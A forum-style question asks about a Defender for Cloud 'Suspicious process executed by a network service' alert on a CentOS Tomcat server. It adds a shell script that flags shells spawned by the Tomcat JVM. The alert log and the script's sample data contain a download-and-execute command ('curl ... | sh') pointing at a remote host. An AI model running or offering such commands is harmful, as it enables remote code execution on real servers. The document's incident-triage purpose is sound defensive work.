Receiving a Microsoft Defender for Cloud "Suspicious process executed by a network service" alert for CentOS Linux

I am an Azure consultant and I received a Microsoft Defender for Cloud "Suspicious process executed by a network service" alert for CentOS Linux.

Environment: Apache Tomcat running on CentOS Linux 7.9.0

The Defender alert details are as follows.

1/6/2024 9:11:14 PM 
 [7402] java -Djava.util.logging.config.file=/opt/tomcat/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djava.security.egd=file:///dev/urandom -Djava.awt.headless=true -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dorg.apache.catalina.security.SecurityListener.UMASK=0027 -Xms512M -Xmx1024M -server -XX:+UseParallelGC -Dignore.endorsed.dirs= -classpath /opt/tomcat/bin/bootstrap.jar:/opt/tomcat/bin/tomcat-juli.jar -Dcatalina.base=/opt/tomcat -Dcatalina.home=/opt/tomcat -Djava.io.tmpdir=/opt/tomcat/temp org.apache.catalina.startup.Bootstrap start
Command line /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.372.b07-1.el7_9.x86_64/jre//bin/java -Djava.util.logging.config.file=/opt/tomcat/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djava.security.egd=file:///dev/urandom -Djava.awt.headless=true -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dorg.apache.catalina.security.SecurityListener.UMASK=0027 -Xms512M -Xmx1024M -server -XX:+UseParallelGC -Dignore.endorsed.dirs= -classpath /opt/tomcat/bin/bootstrap.jar:/opt/tomcat/bin/tomcat-juli.jar -Dcatalina.base=/opt/tomcat -Dcatalina.home=/opt/tomcat -Djava.io.tmpdir=/opt/tomcat/temp org.apache.catalina.startup.Bootstrap start
Process id 7402
Image file path /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.372.b07-1.el7_9.x86_64/jre/bin/java
Image file SHA1 2bffb1d3d46365ca0e78f96577123814b54dbe88
Image file last modification time May 15, 2023 8:25:05 PM
Image file java
Effective user tomcat
1/6/2024 9:11:14 PM 
 [7402] bash /bin/sh -c "cd / ;curl -fsSL http://222.108.161.27:7070/docs/da.txt |sh"
Command line /bin/sh -c "cd / ;curl -fsSL http://222.108.161.27:7070/docs/da.txt |sh"
Process id 7402
Image file path /usr/bin/bash
Image file SHA1 9ad737cbd8bbdddc96726156dbd3bc03936bf02f
Image file last modification time Nov 24, 2021 10:03:27 PM
Mitre techniques T1505: Server Software Component, T1059: Command and Scripting Interpreter, T1059.004: Unix Shell, T1505.003: Web Shell, T1190: Exploit Public-Facing Application
Image file bash
Effective user tomcat
Referenced in commandline http://222.108.161.27:7070/docs/da.txt
Referenced in commandline 222.108.161.27
1/6/2024 9:11:14 PM 
 bash was executed by a network service 'java'
Script content cd / ;curl -fsSL http://222.108.161.27:7070/docs/da.txt |sh
Mitre techniques T1505: Server Software Component, T1059: Command and Scripting Interpreter, T1059.004: Unix Shell, T1505.003: Web Shell, T1190: Exploit Public-Facing Application
Suspicious process executed by a network service New Detected High

I need help understanding the alert details above. Is this process something that runs internally in CentOS, or is it suspicious activity?
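As an added triage example (not part of the original question or of Defender's own logic), the shell function below applies the relationship the alert describes, a shell or downloader process whose ancestor is a java process owned by the tomcat service account, to a `ps` snapshot so an administrator can reproduce the check on the host. The snapshot, PIDs and the 192.0.2.10 URL are constructed placeholders, not values from the alert.

```shell
#!/usr/bin/env bash
# Added example: flag sh/bash/curl/wget processes that descend from a
# java process running as the service account (the pattern in the alert).
# Input format is what this command produces on CentOS 7:
#   ps -eo pid,ppid,user,comm,args --no-headers

# Constructed sample snapshot (placeholder PIDs and URL, not real IoCs)
SAMPLE_PS='1 0 root systemd /usr/lib/systemd/systemd
7300 1 tomcat java /usr/bin/java -Dcatalina.base=/opt/tomcat org.apache.catalina.startup.Bootstrap start
7402 7300 tomcat bash /bin/sh -c cd / ;curl -fsSL http://192.0.2.10:7070/docs/da.txt |sh
7410 7402 tomcat curl curl -fsSL http://192.0.2.10:7070/docs/da.txt
7411 7402 tomcat sh sh
8000 1 root sshd /usr/sbin/sshd -D'

# find_shells_spawned_by_java <ps-snapshot> <service-user>
# Prints "pid ppid comm args" for every shell/downloader whose ancestor
# chain contains a java process owned by <service-user>.
find_shells_spawned_by_java() {
  local snapshot="$1" svc_user="$2"
  printf '%s\n' "$snapshot" | awk -v svc="$svc_user" '
    # Walk up the parent chain; stop at init or after 32 hops.
    function spawned_by_java(p,   a, depth) {
      a = ppid[p]; depth = 0
      while ((a in comm) && depth < 32) {
        if (comm[a] == "java" && user[a] == svc) return 1
        a = ppid[a]; depth++
      }
      return 0
    }
    {
      pid = $1; ppid[pid] = $2; user[pid] = $3; comm[pid] = $4
      args = ""; for (i = 5; i <= NF; i++) args = args (i > 5 ? " " : "") $i
      cmdline[pid] = args; order[++n] = pid
    }
    END {
      for (k = 1; k <= n; k++) {
        p = order[k]
        if (comm[p] ~ /^(sh|bash|dash|curl|wget)$/ && spawned_by_java(p))
          printf "%s %s %s %s\n", p, ppid[p], comm[p], cmdline[p]
      }
    }'
}

# Run against the constructed sample; on a live host pass
# "$(ps -eo pid,ppid,user,comm,args --no-headers)" instead of "$SAMPLE_PS".
find_shells_spawned_by_java "$SAMPLE_PS" tomcat
```

A hit is not proof of compromise on its own, but a shell spawned by the Tomcat JVM that pipes a remote script into `sh` is not part of normal Tomcat or CentOS operation and warrants isolating the host and reviewing the webapps deployed under /opt/tomcat.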
